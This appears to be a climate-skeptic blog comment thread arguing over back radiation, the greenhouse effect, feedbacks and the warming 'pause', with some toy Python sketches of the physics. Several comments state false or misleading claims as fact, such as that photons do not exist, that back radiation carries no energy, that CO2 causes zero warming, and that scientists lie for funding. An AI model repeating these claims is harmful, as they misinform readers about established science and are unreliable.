The photons do not exist until the instant they are transferred from matter to the 'aether' or vice-versa, and on average, for zero net radiant heat flux, there are no photons created or destroyed. However, you do get thermal incoherence, and this is centred about zero but randomly goes to +/- 4x the amplitude of any monochromatic wave, hence the shimmering of night vision goggles or a camera image. If anyone can find fault with this, please explain using correct physics. DO NOT make assumptions which you haven't thought out and can't prove by reference to experiment.

Sky Dragons are banned here for the best of reasons. Not only are they crazy, but their paper-tiger, back-of-the-envelope slaying of the greenhouse effect allows alarmists to *hide* their positive feedbacks from the public eye by having Al Gore train activists to slander all climate model skeptics as being outright deniers of the greenhouse effect itself. And by now you and everybody here is very much well aware of this, and thus your motives are also suspect as you mix feedback arguments with Sky Dragon denial of the greenhouse effect itself, purposefully confusing the two, loudly, in a public forum. The difference between the textbook greenhouse effect and computer model assumptions is the central whistleblowing duty of any seasoned skeptic. Here, you help defeat that effort, or try to at least.

NikFrom NYC, You continue to make statements when you do not even know what my position is and what I say. Read my writeup (the site I gave), and comment. Your preaching about the Sky Dragons is not relevant to me; I have disagreed with them.

NikFrom NYC, Don't quote your degrees to me. I have degrees in Physics (Florida State) and a ScD in Aerospace Engineering (GWU), and have given talks at Princeton, Cambridge, and many others. I do not like to throw my degrees around like you, but need to respond here.

No. Two opposing "energy vectors" do not cancel each other out.
That would be a violation of the energy conservation principle. Energy is a scalar quantity, not a vector. Electromagnetic energy is carried by photons. Yes, a photon could be characterized as a vector, propagating in a specific direction with speed c. But photons are bosons. They don't follow the Pauli exclusion principle, so they don't 'collide' with each other like ordinary particles (fermions). So unlimited numbers of bosons can occupy the same space without any interaction. At the molecular level, energy transfer caused by IR absorption takes place when a molecule absorbs an incoming IR photon, with a resultant increase in its scalar internal energy. What you're suggesting is that when a molecule absorbs two photons coming from opposite directions, it says to itself: "Hey, I just got hit by opposing photons, so I'm ignoring both of them." But that can't happen, because the increase in internal energy is scalar, not dependent on the direction of the incoming photon. It all adds up because the scalar energy traveling in an electromagnetic wave can be modeled precisely by the scalar wave equation, a linear system.

Go back to Planck and then work out the bit he missed out. He hated the idea of a photon. They do not exist except at the moment of energy transfer to or from Planck's quantised dissipative oscillator at the 'cavity' in a surface of condensed matter, or other energy transformation process. So, you must go to Maxwell's laws: conservation of energy requires that the monochromatic heat transfer rate per unit volume of matter = −∇·Fv, where Fv is the monochromatic radiation flux density. Integrate this over all wavelengths and at a plane you get Qdot = −Δ(exitance) at the plane. Add in thermal incoherence, and for equal temperature emitters you have, for each wavelength, a standing wave of amplitude 2x each wavelength amplitude with a superimposed oscillation about zero peaking at +/- 4x each wavelength, hence the shimmering in the night vision goggles.
For unequal temperatures you also have a travelling wave of amplitude equal to the difference of source amplitudes; only this energy flux exists. At the Earth's surface, for equal temperature of surface and atmosphere, there is net zero IR emission in all the self-absorbed atmospheric GHG bands. The only mean net IR emission is 40 W/m^2 in the atmospheric window plus 23 W/m^2 in the weakly absorbed H2O bands with a few km emission/absorption depth. GHG absorption of IR is very different from absorption at a solid in that you cannot have thermalisation of the energy in the gas phase. If you did, the absorptivity would exceed the emissivity; you can't do that at local thermodynamic equilibrium – a breach of Kirchhoff's law of radiation. So, you have to consider the gas phase and all heterogeneous boundaries; the excess energy only thermalises at those boundaries! Hence Tyndall's experiment does not prove gas phase thermalisation – it happens at the inside surface of the brass tube! So, now you can see why Climate Alchemy's 'back radiation' and 'positive feedback' is juvenile physics!

I'm right with Nylo on this one.

Look, the real problem here is that you do not really know these laws of thermodynamics of which you speak. There is absolutely no violation of either the first or second law in the fact that interpolating an absorptive layer between a heated object with finite heat capacity and an infinite-capacity cold reservoir like the 3 K of outer space will cause the heated object's temperature to go up. Not because it is being "warmed" by the absorptive layer – because the flow of heat from the heated object to the cold reservoir is slowed by the interpolated layer, and its temperature has to go up for it to stay in detailed balance. This is an open system with an external heat source, not a stationary problem in passive heat flow from one infinite reservoir to another as in an intro physics textbook.
The single layer model is readily available to look at, and can be solved by hand for the steady state in the limiting case of a perfect absorber. One can then analyze entropy changes and conclude that no processes involved violate the first or second law — quite the contrary, they are derived from a statement of the first law (which is energy conservation, after all), and the net entropy change involved is the transfer of heat from the original energy source, e.g. the Sun, to the cold reservoir, e.g. outer space, via the intermediate steps of absorption and reradiation by the planet and absorption and reradiation by the interpolated layer. It is fine to argue that overall atmospheric feedbacks may — or even probably do — cancel out most of the differential warming caused by marginal increases in CO_2 at this point, if only because for the Earth to have approximately stable temperatures at all, the stable temperature has to be a crossover point for water vapor feedback — water vapor (or if you prefer, the entire collective water cycle) has to respond to a positive temperature fluctuation by increasing cooling to push the system back towards equilibrium, and it has to respond to a negative temperature fluctuation by increasing warming. Otherwise, the first time a warming fluctuation occurred, it would increase water vapor in the atmosphere, which would warm it further, which would increase water vapor still more, and the system would run away on the hot side. Note that I'm not asserting that it is only water vapor involved — the collective nonlinear feedback behavior of the system will be at the crossover in order for any temperature to be locally stable, so one always expects the overall sign of the response to a "warming perturbation" to be negative (cooling) and to a "cooling perturbation" to be positive (warming). This really is elementary physics — taught in any intro course when stable vs unstable equilibrium is considered.
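The stability argument here can be sketched in a few lines of toy code (illustrative only: the feedback parameter `lam`, the time step, and the initial anomaly are invented numbers, not climate values). A linearized anomaly obeying d(dT)/dt = lam·dT decays back toward equilibrium when the net feedback is negative and runs away when it is positive, which is exactly the crossover being described:

```python
# Toy sketch of linearized feedback stability (all numbers invented):
#   d(dT)/dt = lam * dT
# lam < 0 -> net negative feedback, the perturbation decays back to zero;
# lam > 0 -> net positive feedback, the perturbation grows without bound.

def evolve(dT0, lam, dt=0.1, steps=100):
    """Step the linearized anomaly forward in time with forward Euler."""
    dT = dT0
    for _ in range(steps):
        dT += lam * dT * dt
    return dT

# A warming fluctuation of 1 unit under net negative feedback shrinks away...
damped = evolve(1.0, lam=-0.5)
# ...while the same fluctuation under net positive feedback runs away.
runaway = evolve(1.0, lam=+0.5)

assert damped < 1.0 and runaway > 1.0
```

The point of the sketch is only the sign of `lam`: a climate that has stayed quasi-stable through many warm years behaves like the `lam < 0` case at its operating point, not the `lam > 0` one.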
It can be confounded, of course, in nonlinear multivariate systems, but the simple linearized argument for positive feedback from water vapor makes little sense given the empirical lack of an irreversible runaway warming triggered by any particularly warm year. A random walk cannot stabilize it — there must be net negative feedback for long term stability. But to argue that there is no greenhouse effect at all, or even that there is no marginal warming at all from increased CO_2 — that's just crazy talk. The latter is just barely possible, but if it is true it would be due to some truly crazy internal multivariate nonlinearities in the system that cannot be described at all in linearized terms. My credentials — in case you want to throw back a no true Scotsman argument or impugn my knowledge of physics — I'm a physics Ph.D., currently teaching intermediate electrodynamics to physics majors (with a bunch of grad students sitting in) and introductory mechanics and introductory E&M to undergraduate life science and engineering students respectively, and I have written my own physics textbooks after having taught physics at all levels (and done research in theoretical physics in various subjects) since roughly 1977. That doesn't mean that I'm right, of course — that would be a logical fallacy — but it damn skippy means that I'm a lot more likely to be right than nearly anyone you are likely to ever meet, and if nothing else you ought to take what I say above very seriously and not reply with some trivially mistaken argument. The skeptical argument against catastrophic anthropogenic global warming is not helped politically by individuals who assert that there is no such thing as the greenhouse effect or that the laws of thermodynamics are violated by "back radiation", etc. That's sheer nonsense — they are no such thing — and besides, it is absolutely bone simple to go outside and measure downwelling thermal radiation from the atmosphere, any night of the week.
This downwelling radiation would be absent if there were no atmosphere, right? This downwelling radiation is part of the energy flow budget of the surface. The surface is going to radiatively cool faster with no atmosphere than it is going to cool with one that absorbs its outgoing radiation and re-radiates part of it back. It really is as simple as that. rgb

You cannot claim there is zero CO2-AGW unless you cover all possible control systems in the atmosphere. And Climate Alchemy has made so many mistakes in the physics, there is no chance of that. Re: 'downwelling radiation', a pyrgeometer measures the apparent temperature. This is then converted by the S-B equation to the notional emittance (aka exitance) of the atmosphere in the view angle of the instrument. That view angle is set by two parts of the apparatus: the box which shields the back of the detector from the emittance of the emitters in the opposite direction, and the hole in the front. Put back to back pyrgeometers in the atmosphere and, with no temperature gradient, the net signal is zero. This is because it is the vector sum of emittances. Therefore the only IR heat transfer at any plane in the atmosphere, including the surface plane, is the difference of opposing emittances. In other words, 'downwelling radiation' for equal surface and local atmosphere temperatures transfers zero energy. To claim otherwise is to participate in the biggest scientific cock-up in history. Put it another way: just because a pyrgeometer is calibrated in W/m^2 (the potential energy flux of the emitter(s) in its view angle to a sink at absolute zero), doesn't mean it's real. Only part of it can be real, if it is from a body with a higher net emittance in the overlapping wavelengths than the radiation sink. This is Radiative Physics 101, proven by experiment. No-one has ever proved that back radiation is real, defined as doing it by calorimetry.
"The surface is going to radiatively cool faster with no atmosphere than it is going to cool with one that absorbs its outgoing radiation and re-radiates part of it back. It really is as simple as that." TRUE, but Climate Alchemy has completely failed to understand why! More at another time!

Here goes, at the risk of asking a couple of dumb questions. But first I should point out I understand the insulating nature of the atmosphere, and that if the insulation effect is increased (i.e. with more CO2), then (all other things being equal) the surface temperature of the earth will most likely increase. So, first, how much of a temperature increase would the changes in CO2 levels (since, say, 1900) account for, purely on the basis of the increased insulating effect of the increased CO2? Second, what effect would those same CO2 increases have on insulating the earth from the sun's warming? (Clearly, insulation works both ways, except whilst the earth may warm, the sun most surely will not.) In other words, which has the bigger effect? Third, are the above insulating effects consistent with the majority of the GCMs? Sorry to drag this back to basics, but I sometimes wonder if we don't lose sight of the forest while we debate about the trees.

I'm not referring to the device of which you speak. I'm talking about spectrographs taken of the atmosphere, looking up. These show nothing like the thermalized radiation you are talking about. They show the actual spectrum being radiated by the greenhouse gases in particular. Top of atmosphere spectrographs, looking down, show matching/inverted patterns where the GHGs have taken a "bite" out of high temperature surface emissions and replaced them with much cooler emissions at a temperature that corresponds to the height at which the atmosphere starts to be transparent to radiation in those bands. Taken together, they aren't just convincing, they are a slam dunk.
I have no idea — really — what you mean when you talk about the vector sum of emittances. Are you trying to refer to the Poynting vector? The flux of the Poynting vector through some particular surface? I also don't understand your point when you say: I really think that you need to take a look at the energy flow in the single layer model. It's really pretty simple, especially if you consider a perfect absorber layer and pure Stefan-Boltzmann. It's less simple for a more realistic model like the one Petty presents and discusses in Chapter 6 of his book, but it is hardly a "cock up", and in both cases the ground layer has to reject the sum of the external heat source (which is much hotter, e.g. the Sun) and the back radiation. Part of this outgoing radiation does indeed get absorbed by the absorber at the same rate that the absorber returns it, but that doesn't stop the ground from having to warm up to maintain a total outward directed flow of energy equal to the sum of the solar heating and the back radiation. In other words, even though in detailed balance, of course, the net flow between the atmosphere and ground is zero, the ground is still stuck warming enough to reject BOTH the energy that it bounces back and forth between it and the atmosphere and the energy it receives from the sun and ultimately has to lose to space. This is really obvious with the single layer model, where the Earth receives heat at rate P_sun + P_back (sun plus back radiation), it radiates heat at the rate P_out = P_sun + P_back (otherwise it isn't in balance, it is warming or cooling), and the surrounding shell receives radiation at rate P_out (perfect absorber) and radiates P_out/2 outward (so the whole system is in balance) and P_out/2 back inward as the back radiation P_back, completing the model so that it is consistent. Total flow in is P_sun, from the sun only. Total flow out is P_sun, radiated into the outward direction from the absorber layer only.
But the temperature the Earth has to be to radiate P_out for any nonzero P_back is strictly greater than the temperature it would have if P_back were zero, that is, if there were no atmosphere/absorptive layer interpolated between it and some presumed absolute zero surrounding absorber (where 3 K is an excellent approximation). In this model, of course, the interpolating shell (if it has roughly the same radius as the Earth, only a bit larger) acquires the temperature the Earth would have had if there were no layer, as it has to radiate P_sun outward, just like the Earth would have had to do. In the atmosphere, it isn't a perfect absorber, it isn't a perfect conductor perfectly insulated from the Earth's surface, there is convection etc., and the entire atmosphere has a lapse rate. However, the back radiation in the coupled channel at the surface equilibrium temperature basically ensures that the surface does not cool from radiation emitted in this channel (or band — the comparatively narrow range of frequencies where e.g. CO_2 is a strong absorber). Again, the surface has to be warmer to reject enough heat through the unblocked part of the spectrum at its blackbody temperature. I'm sure we can make up some lovely stories about somebody receiving basketballs from their coach at the rate of one every five seconds and having to pass them to someone at the other end of the court before the next one arrives. Part of the drill is run with no opposition, and it is pretty easy — the player catches the ball and throws it, preventing balls from building up in his end of the court. Then an opposing player gets in the way. One ball in five the opposition intercepts and immediately passes back. Now the player has to throw six balls every twenty five seconds instead of five, and has to work harder and gets hotter even though, hey, there is no net transfer of basketballs between him and the opposition and balls never build up in his hands or the hands of the opposition.
It doesn't even matter if the opposition returns all of the balls to the player. They could return every other ball to the player, and throw the other one on down the court themselves (a better metaphor). The player still has to throw more balls per second when there is opposition than when there isn't, even if the opposition doesn't ever accumulate balls and hence hold more balls than the player. Obviously, the rate at which the Earth throws these "balls" is proportional to T^4. That's why the temperature goes up in a way related to the rate at which the atmosphere returns part of the radiation, even though in the end there isn't necessarily any net transfer of radiation in the blocked channel. rgb

Answer to John H. For the present Earth's atmosphere there is zero CO2-AGW. The GHE is set by clouds and ice. Ice ages are the result of a change in cloud albedo as biofeedback changes, mostly phytoplankton, but this requires a thermohaline circulation. If there is no thermohaline circulation, caused by no ice caps, you get another 10 K or so mean temperature rise, the other stable atmosphere mode.

RGB is correct. Using a standard infrared thermometer like mine, of the kind used by many technicians in the HVAC industry, the downwelling radiation (AKA "back radiation") can be easily observed. In clear skies the observed temperature is not correct, because the atmospheric greenhouse gases do not radiate over the full spectrum of a black body. But clouds do, and one can even estimate their altitude by their temperature difference with the surface and an assumed approximate lapse rate. The thermometer is observing and receiving radiation from a colder area. If it is pointed at a wall in a room at the same temperature as the device, it will correctly read the temperature even though the net heat transfer is zero. According to the Stefan-Boltzmann law, a body emits radiation proportional to T^4. It does not look around for a warmer body and stop radiating if it finds one.
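The single-layer model invoked several times in this thread can be solved for its steady state in a few lines (a toy sketch only: one perfectly absorbing, perfectly emitting shell, pure Stefan-Boltzmann, no convection or lapse rate; the 240 W/m^2 absorbed solar flux is the usual textbook round number, not a measured input here):

```python
# Toy steady state of the single-layer greenhouse model: a surface
# absorbing solar flux S, wrapped in one perfectly absorbing shell.
# Pure Stefan-Boltzmann, no convection, no latent heat -- all the
# caveats raised in the thread apply.
SIGMA = 5.670374419e-8   # Stefan-Boltzmann constant, W m^-2 K^-4
S = 240.0                # absorbed solar flux, W/m^2 (textbook round number)

# Without a shell the surface must radiate S directly to space:
T_bare = (S / SIGMA) ** 0.25

# With the shell: the shell absorbs the surface emission E and re-emits
# E/2 outward and E/2 back inward.  Surface balance S + E/2 = E gives
# E = 2S, so the surface must be warmer; the shell itself radiates S
# outward, i.e. it sits at the old bare-surface temperature.
T_surface = (2.0 * S / SIGMA) ** 0.25
T_shell = T_bare

print(round(T_bare))     # 255  (kelvin)
print(round(T_surface))  # 303  (kelvin)
```

The factor of 2^(1/4) between the two surface temperatures is exactly the "warmer to reject both flows" bookkeeping described above; the realistic complications (convection, lapse rate, partial absorption) change the size of the difference, not its sign.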
I noticed that the equations in one of the ASHRAE handbooks (American Society of Heating, Refrigerating and Air-Conditioning Engineers) for estimating heat loss and transfer in a room include (among other things) calculation of the radiation of all the surfaces, walls and windows in the room, even the cold ones. These are practical people who make a living by being right most of the time. When the content of a greenhouse gas increases, the effective altitude from which photons escape to the surface drops to a lower and warmer level, which increases the downwelling radiation and reduces the net heat leaving the surface, forcing it to warm. Knowing the increase in radiation from spectral tools such as SpectralCalc or Modtran, my three-level global energy balance model can estimate the surface temperature change.

Thank you… that's all I can say.

That 238.5 watts/m^2 was made when CO2 levels were 370 – 380 ppm. I wonder what the new rates would be based on 400 ppm of CO2.

Gravy trains are difficult to stop. The climate apparatchiks in the various government institutions, politicians milking the renewable subsidies, and the attacks by environmentalists will make sure the AGW meme continues for some time to come. Let's face it, if you are desperate enough to pretend to be a Nobel laureate, there will be nothing you will not stoop to.

"It has been roughly two decades since there was a trend in temperature significantly different from zero." And the powers that be that hand out taxpayers' monies need to amplify this every time there is another handout demanded.

In reality, as the Pause continues unabated, plus more and more blackouts occur in parts of the western world during winter due to over-reliance on renewables, so the funding for 'climate science' will contract.
A smart 'climate scientist' will conclude that it is now time to come clean and say it as it really is; that way there may be a chance of surviving the inevitable cull of pseudo-scientists spouting the official alarmist line. I have to admit that the thought of an army of unemployed 'climate scientists' gives me a warm, fuzzy feeling. Unfortunately, these clowns will never be prosecuted for economic crimes against humanity.

Obviously there are not many "smart climate scientists" willing to kill the cash cow. I feel sorry for some who know the truth, but need to lie to keep their jobs. What a degradation from the principles that were likely held when they first entered this profession.

It is good to see a lukewarmer admitting he may be exaggerating a climate sensitivity of even 1 degree C. Good on you, Matt Ridley. Take note, Lord Monckton and Nigel Lawson also. Not paywalled here:

This is a real problem for the scaremongers – there is no obvious replacement. In a few years biotech or nanotech will be producing scare stories, but for now it's looking increasingly likely there will be a hiatus in funding.

Poor old Nylo! He must be on the g$avy t$ain!

Amazing how some people can forecast the weather in 15 years time!

@George Lawson, only profets forecast the weather (and they often miss). I was only talking about global average temperatures, not weather. And rather than forecasting, I was extrapolating observed past cyclical behaviour. The only implicit assumption is that everything will behave as it always has, but yes, it is a rather strong assumption. That's why I only said "likely", which in IPCC language just means 67% certainty.

Heh, pretty standard skepticism by Nylo, were there such a thing. The question is whether or not the recovery from the LIA continues. Since that recovery is a millennial scale phenomenon, presently not understood, we must be agnostic. Not terribly cool to knee-jerk over 'global warming will start again afterwards'.
We don't really know, now, do we?
================
You must hone your climate sensibility, heh.
=============
Dang, 'refine' instead of 'hone'.
===========
(I meant, only profets forecast the weather THAT FAR into the future.)

Nylo……. prophets, not profets. All the CAGW scammers are making profits. ;^D

While the theoretical, laboratory "climate sensitivity" of doubling CO2 from 280 to 560 ppm in dry air might be a gain of 1.2 degrees C near earth's surface, it's quite possible IMO that the effective "equilibrium CS" of such an increase in the actual atmosphere could be around zero degrees C, thanks to negative water vapor, cloud and other feedbacks. Climatology is still in its infancy, and valuable research resources have been wasted on meaningless GIGO models, when what has been and still is needed are more and better observational data.

It's called "Le Chatelier's Principle" in basic chemistry – any change in concentrations of a chemical system will produce feedbacks that partially counteract that change. Example: adding CO2 to the atmosphere, whether by ocean outgassing, by fossil fuels, or by killing soil organisms, will produce negative feedbacks, such as increased plant growth to absorb the carbon dioxide, ocean absorption, etc. One key is offset – the feedback must be negative. The other key is partial – the change is not reduced to zero.

The third is "equilibrium". That is, you meant "equilibrium concentration" in a chemical system. The earth's climate system is in a less well-defined state of free energy balance than a chemical equilibrium, because it is an open, nonlinear, chaotic, multivariate system. It therefore can violate this principle. However, there are good reasons in the theory of nonlinear chaotic multivariate systems to think that it does not — in particular the long term quasi-stability of the climate system. This is precisely why I am puzzled when climate scientists assert strong positive feedback from water vapor.
That isn't the default assumption by any means. Indeed, it is the least likely assumption, one that would need to be carefully and extensively proven. Positive water vapor feedback at equilibrium violates the concept of stability — it is difficult to explain how the feedback could be positive and yet the system is nevertheless stable. rgb

Thanks for your well-reasoned, rational and competent comments, unlike the fanatical, hysterical and histrionic venom spewing forth from RACook1978. Yours is the type of useful information that can lead climate scientists to reconsider their assumptions and tune their models accordingly. This should be an on-going process as more climate data comes online, and I am sure that it is.

I'm puzzled. How do you arrive at the number "15 years"? By consulting a Ouija board? Your local gypsy? Tarot? What exactly does the word "likely" mean in this assertion? How does the ocean "modulate" the warming induced by increased GHGs, and how exactly are you solving the coupled Navier-Stokes equations (including all latent heat terms and integration over all of the wavelengths involved across all of the line absorptivities involved, accounting fully for things like precession, obliquity, eccentricity, solar variability, and the unpredictability of decadal oscillations and volcanic activity) that actually describe this process? I mean, jeeze, you take a problem that is (apparently) not accurately computable by smart people working very hard with the world's largest computers, and you solve it in your head and make a positive pronouncement with an air of absolute certainty. Why not just say that we have no bloody idea what the climate will "likely" do over the next 15 years, because we utterly lack a predictive understanding of the underlying dynamics on any sort of macroscopic scale with any sort of demonstrated predictive skill, and the microscopic dynamics is not computable? Why use the word "likely" at all? How likely? How would you compute likelihood?
I know that what you mean to say is that you think it plausible that the ocean is — somehow — preventing CO_2 from warming the planet as much as it is supposed to according to the models, and that you think it probable that such warming as we have seen in recent years was from natural causes, interpreted as "warming that would have occurred anyway, maybe, even without CO_2". But if you are going to be that specific — 15 years — support the assertion, please, with something more than "I think that". I'm betting that you will invoke the PDO and the apparent periodicity in the temperature record from the last 150 years. Then explain why that pattern — which does not persist into the past earlier than 150 years ago (and fails absurdly to describe 500, 1000, 2000 years) — "should" persist for the next 15 years, or 50 years, or 500 years. In fact, explain that "pattern" at all. Not as a fit to a model, but in terms of computable physics. rgb

Meh, 15 years is a pretty good guess by a lot of people, and it has to do with the end of the concatenation of the cooling phases of the oceanic oscillations. That is not to say that there is anything wrong with your critique. I'm a little amused that Nylo has been so attacked for what is fundamentally a reasonable skeptical speculation.
===================
Let me put it this way. If the temperature starts back up in 15 years, it will be Right On Time, and if the rise is at the same slope as the last three times, it will again demonstrate, for the second time, that AnthroCO2 has little effect, i.e., a demonstration of low climate sensitivity. It's one we've seen already, in the last quarter of the last century.
====================
I think Nylo's assumptions are reasonable. That's about the way I'm thinking, and straight off the bat I'd say it's linked to the PDO "phenomenon". And I call it that because I haven't a clue what actually causes it. Nobody does.
In fact I'd go further and say if we only got the underlying cause of it out of this climate debacle, it will have gone some way to nearly being worth it. I don't think it is the shifting of a body of heat from one zone to another; rather, whatever is causing that body of heat to shift is also doing subtle things to the rest of the climate that result in very roughly thirty year warm-cool cycles, and because some other phenomenon has us in a longer term warming cycle, the warm periods warm more than the cool periods cool. Trends always break down eventually, but given that we are, millennially speaking, in a very benign state at present, I think it's safer to assume that temperatures will continue moving down slowly, and that this will likely last 15 or so years. This century we will have two cooling cycles and one warming one, so temps will be at or around the 1998 peak by the end. That's my hunch, based on an aggregation of all I've learnt here.

And hunches are all well and good, as long as they aren't presented as science to either politicians or the public so they can vote on them under the impression that they are voting on the basis of a scientifically known fact.

Indeed, the word "hunch" is about perfect. It implies intuition and the continuation of a possible pattern, without trying to argue that the pattern has any known reason to continue, because we cannot really establish why it has held in the recent past where it has held, but no further back (as far as we can tell). Overall, hunches are bets that the future will be like the past, and (autocorrelation in physical processes being what it is) sometimes that's a good bet. Other times (autocorrelation being what it is in chaotic nonlinear systems, physical or not) it isn't. Today is a day I'd have lost the standard "hunch" bet that the weather today is like the weather yesterday. I'd have lost it yesterday as well.
However, it looks like a good bet for the next three or four days (according to much more sophisticated forecasting models). Five or six or seven days out, even the sophisticated forecasting models are reduced to “the weather this year is likely to be like the weather was last year” — or better yet, an average over a decade of years. And nobody has any idea what the weather will be like the next decade, because it is no better than even odds that it will be like the weather was last decade, and less than even odds like the decade before. Based, of course, on the ill-defined notion that the past, statistically speaking, is a decent predictor of the future. rgb. I think you are exactly right. If you look at the temperature anomaly chart and attempt to correct for the PDO, the temperature curve looks different. Remove 0.4 degrees for each of the cycles and you get something that looks like a temp rise of 0.3 degrees from 1910 to 1945, then 0.3 degrees from 1945 to 1975, then 0.2 degrees from 1975 to 1998. The PDO is now in a cooling phase and effectively canceling any rise in temp from CO2. It appears that the sensitivity to CO2 is dropping. So I am of the opinion that in about 60 years, we will find our temperatures at 0.5 degrees hotter. That’s my WAG. All rationalization, nothing empirical. Once more for the collection… Where’s global warming? By Jeff Jacoby, Globe Columnist | March 8, 2009 What happened to global warming? By Paul Hudson, BBC | October 9, 2009 Whatever Happened to Global Warming? Matt Ridley, WSJ | September 4, 2014 Here’s the Conversation finally acknowledging “the pause” in a begrudgingly written perfunctory piece: The alarmists at The Con collectively refused to acknowledge “the pause”… hence why there are no comments! ☺ And that is why “Global Warming” was changed to “Climate Change”. Everyone understood what Global Warming meant/was, so when it wasn’t happening, there was a problem for the CAGW crowd.
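The back-of-envelope correction described in that comment, subtracting an assumed oscillatory contribution from the anomaly to expose an underlying trend, amounts to decomposing the series into trend plus oscillation. A toy sketch; the trend rate, amplitude, and 60-year period are illustrative assumptions chosen only to mirror the commenter’s rough figures, not fitted to real data:

```python
import math

# Toy decomposition: anomaly = slow trend + oscillation.
# All numbers here are illustrative assumptions, not real temperature data.

def toy_anomaly(year, trend_per_century=0.7, osc_amp=0.2, period=60.0):
    """Synthetic anomaly: linear trend plus a ~60-year PDO-like oscillation."""
    trend = trend_per_century * (year - 1900) / 100.0
    osc = osc_amp * math.sin(2 * math.pi * (year - 1900) / period)
    return trend + osc

def remove_oscillation(year, anomaly, osc_amp=0.2, period=60.0):
    """Subtract the assumed oscillatory component, leaving the trend."""
    return anomaly - osc_amp * math.sin(2 * math.pi * (year - 1900) / period)

for year in (1910, 1945, 1975, 1998):
    raw = toy_anomaly(year)
    corrected = remove_oscillation(year, raw)
    print(year, round(raw, 3), round(corrected, 3))
```

The catch, as the commenter concedes (“all rationalization, nothing empirical”), is that the decomposition only works if you already know the amplitude and period of the oscillation you are removing; guess them wrong and the “corrected” trend is an artifact of the guess.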
However, Climate Change can easily be blurred into the everyday changing weather. In this context, there will never be a “pause” in Climate Change. And so it goes. There is no alternative political narrative to “climate change”, so it will live on, no matter how scientifically unsound. It was never about science anyway. The fact is that the political “left” has nothing better to push, and neither has the “right”. We’re locked in, and inertia means the establishment will remain “liberal” even when the meaning of the word liberal is a literal mystery to those that claim to be so. It is all so interesting – but we don’t really know anything for certain. We little humans can utter no trustworthy opinions about how the chaotic manifestations of the world climate will develop in our time. Just wait – I will tell you all about it in 500 years’ time! But at least the IPCC should come down from their hubris-ridden horse of sublime knowing-it-all. That attitude is all they have, so admitting that they really know nothing would mean they would have to fold their tents and move on… never going to happen! Like a bad tenant, they will need to be evicted. Advancing insight in a settled science. Next they want a debate! *keeps on dreaming* And back in 2012, the UK Met Office responded to David Rose’s article, pointing out the standstill. The evidence of the past 26/19/16 years is that there is some self-regulation going on somewhere in the form of negative feedback. Instead of trying to explain this, the scientists are finding more positive feedbacks to make it seem “it’s worse than we thought.” A new study seems to suggest the soil is the source of yet more positive feedback. I’m not sure where this is being manifested, but if it is a real effect it is being masked by other processes of hiding the heat, it not being there, or other negative feedbacks that are not apparent and don’t attract research resources.
The arrogance of policymakers (and I think it is a qualification for the job) is that they can control the climate. I have been castigated by a scientist for using the control-knob analogy as being over-simplistic. I suggested he communicate that to the policymakers, as that is certainly how they view it. I was told that what policymakers wish to believe is not the business of scientists… so if governments were to interpret information wrongly or pick information that reinforces their agenda, the scientists will let them. More than that, they will incentivise the finding of reinforcing information. A turnaround is starting. Increasingly, science is distancing itself from policy decisions. It cannot directly upset government. The teat still has milk. Stand by, when the democratic process says “enough of this”, for the scientists to point at their papers and say “we were misunderstood/misrepresented”. We don’t make policy. No, of course not. But you stood by and allowed your findings to be misrepresented in the media without screaming, in return for 5 minutes of fame. It really is worse than we thought. Sooner or later, the science will acknowledge reality: the scare has been exaggerated. ================ Look in the mirror. Too many of you alarmists deliberately conflate skepticism about catastrophe with skepticism of the basic science. You are transparent in your ignorance or disingenuousness. Why do you think that is good communication? ========================== Welcome to the Dark Side, Mr. Ridley. We’ve been expecting you. I’m shocked! What this layman acknowledges is the raw observational data and that which has been “homogenized” without bias, because “the science” is all over the damned place. Fact is that the claims of those that have been crying CAGW from the rooftops have been and are still being falsified by the data.
In short, those scientists and their disciples that failed to acknowledge the data for years now are not worth listening to, because their “science” is just plain bad. And who exactly is Matt Ridley? Oh, I guess he thinks his background in zoology makes him a climate expert. Why not ask: why have we seen no temperature decreases in the last two decades (as we’ve seen oscillations during the 20th century)? Why is the last decade the warmest on record, warmer than the previous warmest the decade before? Why do the oceans continue to warm, and global ice levels keep dropping… and why does the WSJ continue its irresponsible journalism of printing only one-sided Opinion pieces? “And who exactly is Matt Ridley?” Made me laugh. He is a journalist writing something based on actual factual data. Apparently this is not a combination that meets your approval. LOL some more. Which easy question to debunk? There are several choices. Warmest decade? That’s easy… it was sleight of hand. The ’30s likely were, despite the “adjustments”. The oceans continue to warm? That is cyclical, if poorly understood, and “continue” is based on a very short temp record, most likely adjusted as the land temps have been. Why is the global ice measurement dropping? It isn’t. And to discredit the writer because his science is peripheral to the central debate is the hubris of one who considers his specialty as, well, more special than others. I believe climate and its constant change is best understood by a generalist, but best examined, within their scope, by specialists. As I recall, Ridley was once in your camp… how do you like him now? Barry, could you please pick a couple of temp reconstruction curves and put in your extrapolation of exactly how you think the temp is going to go? Say 100k ya, 10k ya, 100 ya? My take is that we are STILL WARMING from the last interglacial, just like we have many times before: warmer oceans, more CO2. Ice levels at the poles will soon provide a tipping point.
Your point is that recent high-frequency, high-resolution data points to the Holocene temperature trend reversing? @Barry If indeed the WSJ “irresponsibly” only publishes one-sided opinion pieces, it is far from alone in this — the same applies to most other newspapers as well. There isn’t anything irresponsible about it, either — it is called freedom of the press. It is your responsibility, not theirs, to avail yourself of the balance of viewpoints you deem appropriate. Furthermore, whether Matt Ridley is a climate expert is not germane to the issue. Everybody with half a brain can compare the temperatures, which have not risen, to the climate models, which predicted otherwise, and conclude that the models have failed. It may take a climate expert to explain exactly why they have failed, but it does not take one to observe that they have failed. To use a simile: I’m not a car expert, but I’m perfectly able to conclude from observing my car making grinding noises and stalling that it is broken. I will then take it to a car expert to fix it. Should that car expert advise me that the car is indeed fine, I will go with my judgement, not his. Because, you know, I really want it fixed. This whole “you’re not an expert, so you can’t have an opinion” thing is a red herring. Its popularity among the warmers shows their sore lack of common sense. Unfortunately, some folks here make the same mistake against those alarmists with non-climate expertise, such as Tim Flannery or David Suzuki. Barry pushes the old misleading claim about “warmest on record” as though that actually has some relevance. His “record period” covers all of about 150 years and carefully ignores the obvious earlier warm periods: we know that dozens of decades were warmer during both the Medieval Warm Period and the Roman Warm Period, during neither of which were significant numbers of SUVs driving around. So much for the ignorant “warmest on record” claim.
